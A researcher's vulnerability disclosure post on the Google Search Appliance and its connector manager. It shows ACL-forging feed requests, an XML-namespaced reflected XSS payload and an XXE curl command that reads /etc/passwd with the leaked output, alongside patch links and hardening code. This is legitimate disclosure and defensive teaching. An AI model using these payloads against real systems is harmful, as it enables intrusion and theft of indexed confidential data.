I recently found some classic web vulnerabilities in the Google Search Appliance (GSA), and since they are now fixed [0][1][2], I’d like to share them with you.

First of all, some details about the GSA itself. Companies use the GSA to apply Google’s search algorithms to their internal documents without publishing those documents to cloud providers. To accomplish this, the GSA provides multiple interfaces, including a search interface, an administrative interface and several interfaces for indexing the organization’s data.

Feeder Gates

One of the main indexing interfaces is available on TCP ports 19900 (HTTP) and 19902 (HTTPS), where external applications (called feeders by Google) can report changes to documents.

These ports are basically XML APIs fed by file uploads (multipart-encoded XML inside a data POST parameter). They allow feeders to report that documents were deleted or added, or that their access permissions have changed. The latter is essential, as the GSA usually has access to all documents in order to index them, whereas employees should only be able to view the ones they are allowed to access. For example, the following request forces the GSA to re-index the file at http://example.com:5778/doc/ERNW:

```http
POST /xmlfeed HTTP/1.1
Content-Type: multipart/form-data; boundary=<<
User-Agent: Java/1.7.0
Host: 10.1.1.1:19900
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 669

--<<
Content-Disposition: form-data; name="datasource"
Content-Type: text/plain

filesystem
--<<
Content-Disposition: form-data; name="feedtype"
Content-Type: text/plain

metadata-and-url
--<<
Content-Disposition: form-data; name="data"
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE gsafeed PUBLIC "-//Google//DTD GSA Feeds//EN" "">
<gsafeed>
<!--GSA EasyConnector-->
<header>
<datasource>filesystem</datasource>
<feedtype>metadata-and-url</feedtype>
</header>
<group>
<record crawl-immediately="true" mimetype="text/plain" url="http://example.com:5778/doc/ERNW"/>
</group>
</gsafeed>
--<<--
```
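To make the wire format explicit, here is a minimal Java sketch that assembles such a feed body. The class name, method names and the boundary string `feedBoundary` are made up for this illustration; only the field names (datasource, feedtype, data) and the XML structure are taken from the captured request above. It only builds the body and does not send anything. Note that the values are concatenated without escaping, which is acceptable only for fixed, trusted values like the ones in this example.

```java
import java.nio.charset.StandardCharsets;

public class FeedRequestSketch {
    // Arbitrary boundary chosen for this sketch; the captured request used "<<".
    static final String BOUNDARY = "feedBoundary";

    // Appends one form-data part: part headers, an empty line, then the value.
    static void appendPart(StringBuilder sb, String name, String contentType, String value) {
        sb.append("--").append(BOUNDARY).append("\r\n")
          .append("Content-Disposition: form-data; name=\"").append(name).append("\"\r\n")
          .append("Content-Type: ").append(contentType).append("\r\n")
          .append("\r\n")
          .append(value).append("\r\n");
    }

    // Builds a metadata-and-url feed asking the GSA to crawl one URL immediately.
    // Values are NOT XML-escaped here; only use trusted, fixed inputs.
    static String buildFeedBody(String datasource, String url) {
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n"
            + "<!DOCTYPE gsafeed PUBLIC \"-//Google//DTD GSA Feeds//EN\" \"\">\n"
            + "<gsafeed>\n"
            + "<header>\n"
            + "<datasource>" + datasource + "</datasource>\n"
            + "<feedtype>metadata-and-url</feedtype>\n"
            + "</header>\n"
            + "<group>\n"
            + "<record crawl-immediately=\"true\" mimetype=\"text/plain\" url=\"" + url + "\"/>\n"
            + "</group>\n"
            + "</gsafeed>";
        StringBuilder sb = new StringBuilder();
        appendPart(sb, "datasource", "text/plain", datasource);
        appendPart(sb, "feedtype", "text/plain", "metadata-and-url");
        appendPart(sb, "data", "text/xml", xml);
        // Closing delimiter: boundary followed by two dashes.
        sb.append("--").append(BOUNDARY).append("--\r\n");
        return sb.toString();
    }

    public static void main(String[] args) {
        String body = buildFeedBody("filesystem", "http://example.com:5778/doc/ERNW");
        System.out.println("Content-Type: multipart/form-data; boundary=" + BOUNDARY);
        System.out.println("Content-Length: " + body.getBytes(StandardCharsets.UTF_8).length);
        System.out.println();
        System.out.print(body);
    }
}
```

The sketch uses CRLF line endings, as multipart/form-data expects. The Content-Length therefore differs from the 669 bytes of the captured request.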

Of course, one can also adjust the access control data on the GSA. This time, we permit the user max in the EXAMPLE domain to access all files and folders underneath http://example.com:5778/doc/ERNW/:

```http
POST /xmlfeed HTTP/1.1
Content-Encoding: gzip
Content-Type: multipart/form-data; boundary=<<
User-Agent: Java/1.7.0
Host: 10.1.1.1:19900
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Transfer-Encoding: chunked

--<<
Content-Disposition: form-data; name="datasource"
Content-Type: text/plain

filesystem
--<<
Content-Disposition: form-data; name="feedtype"
Content-Type: text/plain

metadata-and-url
--<<
Content-Disposition: form-data; name="data"
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE gsafeed PUBLIC "-//Google//DTD GSA Feeds//EN" "">
<gsafeed>
<!--GSA EasyConnector-->
<header>
<datasource>filesystem</datasource>
<feedtype>metadata-and-url</feedtype>
</header>
<group>
<acl inherit-from="http://example.com:5778/doc/ERNW/?allFilesAcl">
<principal scope="user" access="permit" case-sensitivity-type="everything-case-insensitive">EXAMPLE\max</principal>
</acl>
<acl inherit-from="http://example.com:5778/doc/ERNW/?allFoldersAcl">
<principal scope="user" access="permit" case-sensitivity-type="everything-case-insensitive">EXAMPLE\max</principal>
</acl>
</group>
</gsafeed>
--<<--
```
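The ACL part of such a feed can also be generated with the standard DOM API instead of string concatenation. The following is a sketch under the assumption that only the `<group>` element shown above is needed; `AclGroupSketch` and `buildAclGroup` are hypothetical names, while the element and attribute names are copied from the request above. Letting the DOM serializer write the XML means attribute and text values are escaped automatically.

```java
import java.io.StringWriter;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.OutputKeys;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamResult;
import org.w3c.dom.Document;
import org.w3c.dom.Element;

public class AclGroupSketch {
    // Builds a <group> with one <acl> per inherit-from URL, each permitting the same user.
    static String buildAclGroup(String user, String... inheritFrom) {
        try {
            Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder().newDocument();
            Element group = doc.createElement("group");
            doc.appendChild(group);
            for (String source : inheritFrom) {
                Element acl = doc.createElement("acl");
                acl.setAttribute("inherit-from", source);
                Element principal = doc.createElement("principal");
                principal.setAttribute("scope", "user");
                principal.setAttribute("access", "permit");
                principal.setAttribute("case-sensitivity-type", "everything-case-insensitive");
                principal.setTextContent(user);
                acl.appendChild(principal);
                group.appendChild(acl);
            }
            // Serialize without an XML declaration; values are escaped by the serializer.
            Transformer t = TransformerFactory.newInstance().newTransformer();
            t.setOutputProperty(OutputKeys.OMIT_XML_DECLARATION, "yes");
            t.setOutputProperty(OutputKeys.INDENT, "yes");
            StringWriter out = new StringWriter();
            t.transform(new DOMSource(doc), new StreamResult(out));
            return out.toString();
        } catch (ParserConfigurationException | TransformerException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String base = "http://example.com:5778/doc/ERNW/";
        System.out.println(buildAclGroup("EXAMPLE\\max", base + "?allFilesAcl", base + "?allFoldersAcl"));
    }
}
```

The attribute order in the serialized output may differ from the captured request. That difference is irrelevant to XML parsers.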



Note that these ACLs do not propagate back to the actual permissions set on the filesystem/wiki entry/…, but since the GSA supports document previews like the Internet-wide search engine does, this might be enough to leak confidential data to internal attackers. To reduce the attack surface, Google added a setting that restricts which IP addresses may communicate with the feeder gates. It is configured as a list of trusted IPs in the administrative interface (translated option labels: List of Trusted IP Addresses; Trust feeds from all IP addresses; Only trust feeds from these IP addresses).

Once you’ve set the trusted IP list properly and protected your network against IP spoofing (your clients and your feeders don’t communicate with the GSA through the same gateway, right?), you should be reasonably safe against this kind of ACL forging.

Connectors

As you may have noticed, the feeder gates are only used to trigger the crawling of documents. The crawling itself is done by so-called connectors, which extend the GSA and bridge the gap between the search engine and the different storage backends (filesystem, database, wiki, Active Directory, …). These connectors are managed by the “connector manager” (version 3 or 4, depending on your GSA patch level) on port 7885. As the source code of v3 is publicly available (https://github.com/googlegsa/manager.v3/), I took a brief look at it. This time, I found a full XML API that reads its commands directly from the request body instead of from multipart-encoded parameters. The connector manager exposes the following API calls:

| URL | Description | Accessible by |
|---|---|---|
| /setManagerConfig | Sets the manager configuration (feeder host, port and protocol) | localhost or whitelisted IPs |
| /getConnectorList | Returns the list of currently installed connectors | localhost or whitelisted IPs |
| /getConnectorInstanceList | Returns the list of currently running connectors | localhost or whitelisted IPs |
| /setConnectorConfig | Sets the configuration of a specific connector | localhost or whitelisted IPs |
| /getConfigForm | Returns a configuration form for a specific connector type | localhost or whitelisted IPs |
| /getConfig/configuration.zip | Returns the configuration directory | everyone |
| /getConfiguration/configuration.zip | Returns the configuration directory | everyone |
| /getConnectorLogLevel | Returns the current log level of the connector | everyone |
| /setConnectorLogLevel | Sets the current log level of the connector | everyone |
| /getFeedLogLevel | Returns the current log level of the feed parts | everyone |
| /setFeedLogLevel | Sets the current log level of the feed parts | everyone |
| /getConnectorLogs/ALL | Returns the log files of the connector (currently not changed by Google) | everyone |
| /getFeedLogs/ALL | Returns the log files of the feed part (currently not changed by Google) | everyone |
| /getTeedFeedFile/ALL | Returns the log files of a teed feed file, has to be configured (currently not changed by Google) | everyone |
| /getConnectorStatus | Returns the status of a given connector | localhost or whitelisted IPs |
| /restartConnectorTraversal | Restarts the repository traversal of a given connector | localhost or whitelisted IPs |
| /setSchedule | Sets a schedule for a given connector | localhost or whitelisted IPs |
| /authenticate | Authenticates a user | localhost or whitelisted IPs |
| /authorization | Authorizes a user for the given connectors | localhost or whitelisted IPs |
| /getConnectorConfigToEdit | Returns a configuration form for a specific connector | localhost or whitelisted IPs |
| /removeConnector | Removes a given connector | localhost or whitelisted IPs |
| /getDocumentContent | Returns a document by its ID from a given connector | everyone |

XSS

Many of the above endpoints suffer from classic reflected XSS vulnerabilities. The root cause is the way most exception messages are processed: most of them end up in a status object like this:

```java
status = new ConnectorMessageCode(
    ConnectorMessageCode.EXCEPTION_CONNECTOR_NOT_FOUND, connectorName);
```

Here, connectorName is a string value controlled by the attacker. Looking at the ConnectorMessageCode constructor used here, you will see that the string is stored as the single message parameter:

```java
public ConnectorMessageCode(int messageId, String param) {
  set(messageId, null, new Object[] { param });
}
```

This status object is later passed to the following method:

```java
public static void writeResponse(PrintWriter out,
    ConnectorMessageCode status) {
  writeRootTag(out, false);
  writeMessageCode(out, status);
  writeRootTag(out, true);
}
```

Following the writeMessageCode call, we end up here:

```java
public static void writeMessageCode(PrintWriter out,
    ConnectorMessageCode status) {
  writeStatusId(out, status.getMessageId());
  if (status.getMessage() != null && status.getMessage().length() > 1) {
    writeXMLElement(
        out, 1, ServletUtil.XMLTAG_STATUS_MESSAGE, status.getMessage());
  }
  if (status.getParams() == null) {
    return;
  }
  for (int i = 0; i < status.getParams().length; ++i) {
    String param = status.getParams()[i].toString();
    if (param == null || param.length() < 1) {
      continue;
    }
    out.println(indentStr(1)
        + "<" + XMLTAG_STATUS_PARAMS
        + " " + XMLTAG_STATUS_PARAM_ORDER + "=\"" + Integer.toString(i) + "\""
        + " " + XMLTAG_STATUS_PARAM + "=\"" + param
        + "\"/>");
  }
}
```

BOOM! The lower part of the function writes the parameters of the status object into an XML attribute without any encoding, which results in a classic reflected XSS. As the output is strict XML, we can’t use a simple `"><script>alert("XSS")</script>` here. Instead, the payload has to be well-formed XML, and the script element has to be placed in the XHTML namespace:

```xml
"/><html:script xmlns:html="http://www.w3.org/1999/xhtml">alert("XSS")</html:script><foo a="
```

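The difference between the vulnerable concatenation in writeMessageCode and an encoded variant can be sketched as follows. The tag and attribute names (CMParams, Order, CMParam) are taken from the responses shown in this post; `escapeXmlAttribute` and the two `...ParamLine` methods are hypothetical helpers for this illustration and not necessarily how Google’s patches [0][1][2] address the issue.

```java
public class CmParamEscapingSketch {
    // Mirrors the vulnerable concatenation in writeMessageCode (simplified, no indentation).
    static String vulnerableParamLine(int order, String param) {
        return "<CMParams Order=\"" + order + "\" CMParam=\"" + param + "\"/>";
    }

    // Hypothetical helper: escapes the five XML special characters for a quoted attribute value.
    static String escapeXmlAttribute(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&': sb.append("&amp;"); break;
                case '<': sb.append("&lt;"); break;
                case '>': sb.append("&gt;"); break;
                case '"': sb.append("&quot;"); break;
                case '\'': sb.append("&apos;"); break;
                default: sb.append(c);
            }
        }
        return sb.toString();
    }

    // Same output format, but the attacker-controlled value can no longer leave the attribute.
    static String safeParamLine(int order, String param) {
        return "<CMParams Order=\"" + order + "\" CMParam=\"" + escapeXmlAttribute(param) + "\"/>";
    }

    public static void main(String[] args) {
        String payload = "\"/><html:script xmlns:html=\"http://www.w3.org/1999/xhtml\">"
            + "alert(\"XSS\")</html:script><foo a=\"";
        System.out.println(vulnerableParamLine(0, payload));
        System.out.println(safeParamLine(0, payload));
    }
}
```

With the payload above, the vulnerable variant prints `<CMParams Order="0" CMParam=""/><html:script xmlns:html="http://www.w3.org/1999/xhtml">alert("XSS")</html:script><foo a=""/>`, which is well-formed XML containing an injected script element. The escaped variant keeps the whole payload inside the CMParam attribute.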
Another example is an XSS based on an error message raised during validation. The /setLogLevel endpoint takes a level parameter to specify the new log level. As this input is parsed with Level.parse from java.util.logging, any value that is not a known level name such as SEVERE, WARNING, INFO or FINE (or a numeric level) raises an exception:

```java
private Level getLevelByName(String name) throws ConnectorManagerException {
  try {
    return Level.parse(name);
  } catch (IllegalArgumentException e) {
    throw new ConnectorManagerException("Unknown logging level: " + name, e);
  }
}
```

So, guess what: the exception message is placed directly into the XML output via the code path shown above:

```java
ServletUtil.writeResponse(out, new ConnectorMessageCode(
    ConnectorMessageCode.EXCEPTION_HTTP_SERVLET,
    servletName + " - " + e.getMessage()));
```

Sadly, there are some restrictions:

- The input is converted to uppercase (https://github.com/alcuadrado/hieroglyphy helps you with that)

- The XML output is broken by definition -.-'

```xml
<CmResponse>
<StatusId>5313</StatusId>
<CMParams Order="0" CMParam="/getConnectorLogLevel - Unknown logging level: ERNW: Bad level "ERNW""/>
</CmResponse>
```

So to exploit this vulnerability, you’ll need a payload that repairs the XML and injects your data at the same time.
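Why the XML is "broken by definition" becomes clearer with a small reproduction of the error message. This sketch calls the real `java.util.logging.Level.parse`. The class and method names are hypothetical, and two details are assumptions modeled on the output above rather than taken from the connector manager source: the upper-casing of the input, and the `": " + cause message` suffix.

```java
import java.util.Locale;
import java.util.logging.Level;

public class LogLevelMessageSketch {
    // Returns the error text for an invalid level, or null if the level is valid.
    // Assumption: upper-casing and the "<message>: <cause message>" format mimic
    // the response shown above; they are not copied from the connector manager.
    static String errorMessageFor(String rawInput) {
        String name = rawInput.toUpperCase(Locale.ROOT);
        try {
            Level.parse(name);
            return null; // a known level name (or number) was supplied
        } catch (IllegalArgumentException e) {
            // java.util.logging.Level.parse rejects unknown names with: Bad level "<name>"
            return "Unknown logging level: " + name + ": " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        System.out.println(errorMessageFor("fine")); // valid level, prints null
        System.out.println(errorMessageFor("ernw"));
    }
}
```

Level.parse already wraps the rejected value in double quotes. As a result, every invalid level closes the CMParam attribute early, even without any attacker-supplied quote. A working payload therefore has to account for these extra quotes as well.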

XXE

XML external entity injection (XXE) is an attack that abuses the document type definition (DTD), declared via DOCTYPE, to retrieve files or data from the target system, or from other systems via the target. DTDs are used by XML and HTML to specify what a valid document has to look like. The format itself allows references to external files, which are then included into the XML document or the DTD. If this feature is enabled (which is actually the default in most parsers), an attacker can include files they shouldn’t have access to.

Since the whole connector manager is built on XML APIs, this was an obvious thing to check ;). All APIs share the same code for parsing the supplied XML data before using it:

```java
private static DocumentBuilderFactory factory =
    DocumentBuilderFactory.newInstance();

public static Document parse(InputStream in,
    SAXParseErrorHandler errorHandler,
    EntityResolver entityResolver) {
  try {
    DocumentBuilder builder = factory.newDocumentBuilder();
    builder.setErrorHandler(errorHandler);
    builder.setEntityResolver(entityResolver);
    Document document = builder.parse(in);
    return document;
  } catch (ParserConfigurationException pce) {
    LOGGER.log(Level.SEVERE, "Parse exception", pce);
  } catch (SAXException se) {
    LOGGER.log(Level.SEVERE, "SAX Exception", se);
  } catch (IOException ioe) {
    LOGGER.log(Level.SEVERE, "IO Exception", ioe);
  }
  return null;
}
```

If you are familiar with secure Java development, you will notice that several security-relevant features of the DocumentBuilderFactory are not set (OWASP has recommendations on which ones to set). Additionally, the entity resolver is null by default, which means that the parser’s default entity resolution is used:

```java
public static Element parseAndGetRootElement(InputStream in,
    String rootTagName) {
  SAXParseErrorHandler errorHandler = new SAXParseErrorHandler();
  Document document = parse(in, errorHandler, null);
  // ... (remainder of the method omitted)
```

Therefore, the following works (note: this is not actual output from a GSA; I ran the application in a VM on my machine):

```shell
curl -v 'http://192.168.48.2:8080/connector-manager/authenticate' -d '<!DOCTYPE foo [<!ENTITY bar SYSTEM "file:///etc/passwd">]><AuthnRequest><Credentials><Username>&bar;</Username><Password>afoo</Password></Credentials></AuthnRequest>' -H 'Content-Type: text/xml' -si
```

```http
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=UTF-8
Content-Length: 1386
Date: Thu, 10 Dec 2015 14:07:02 GMT

<CmResponse>
<AuthnResponse>
<Success ConnectorName="ernw">
<Identity>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
</Identity>
</Success>
</AuthnResponse>
</CmResponse>
```
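For comparison, here is a sketch of a hardened parser. It roughly follows the OWASP XXE prevention recommendations for DocumentBuilderFactory and is not necessarily what Google’s patches do. `HardenedXmlParser` and `rootElementOrNull` are hypothetical names. Rejecting DOCTYPE declarations entirely is the strongest option. If an API genuinely has to accept a DOCTYPE, the first feature could be dropped, and the remaining settings would still disable external entities and DTD loading.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class HardenedXmlParser {
    static DocumentBuilderFactory newHardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject any DOCTYPE; this alone blocks payloads like the curl example above.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth: never resolve external entities or load external DTDs.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    static Document parse(InputStream in)
            throws ParserConfigurationException, SAXException, IOException {
        return newHardenedFactory().newDocumentBuilder().parse(in);
    }

    // Returns the root element name, or null if the parser refused the input.
    static String rootElementOrNull(String xml) {
        try {
            Document doc = parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement().getTagName();
        } catch (SAXException e) {
            return null; // e.g. a DOCTYPE was present
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(rootElementOrNull("<AuthnRequest><Credentials/></AuthnRequest>"));
        System.out.println(rootElementOrNull(
            "<!DOCTYPE foo [<!ENTITY bar SYSTEM \"file:///etc/passwd\">]>"
            + "<AuthnRequest>&bar;</AuthnRequest>"));
    }
}
```

Without a custom error handler, the JDK parser also prints a "[Fatal Error]" line to stderr when it rejects the DOCTYPE. The rejection itself surfaces as the SAXException that is caught above.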

Conclusions

The vulnerabilities shown here are all caused by missing output encoding and insecure configurations. Each of them could lead to a compromise of the GSA and/or its data model and therefore give attackers access to the confidential data indexed by the GSA. If you are using a GSA, you should update to the latest 7.4 version, which fixes these bugs and, as far as I know, also uses v4 of the connector manager. You should additionally review the IP access controls in the administrative interface to restrict access to the feeder gates and the connector manager.

If you want to learn more about finding and exploiting these and other vulnerabilities, you may want to attend the Web Hacking Special Ops workshop held by Kevin Schaller and myself, most recently at TROOPERS and at various other places this year.

Best,

Timo (@bluec0re)

- https://bufferoverflow.eu/BC-1502.txt

- https://bufferoverflow.eu/BC-1503.txt

Timeline:

- 2016-01-05: Reported to Google

- 2016-01-07: Confirmed

- 2016-01-xx: Patch for 7.4 released (no exact date available due to restricted access to changelogs)

- 2016-03-03: Patches publicly available on github

[0] https://github.com/googlegsa/manager.v3/commit/801eeb0ebfe2c560648465239e2596a379fb77f7

[1] https://github.com/googlegsa/manager.v3/commit/e3fdfdbd1303ea76b296793c8e9f0b3eac4602d8

[2] https://github.com/googlegsa/manager.v3/commit/25506a3abf139753cbafd40137c19278700519ca
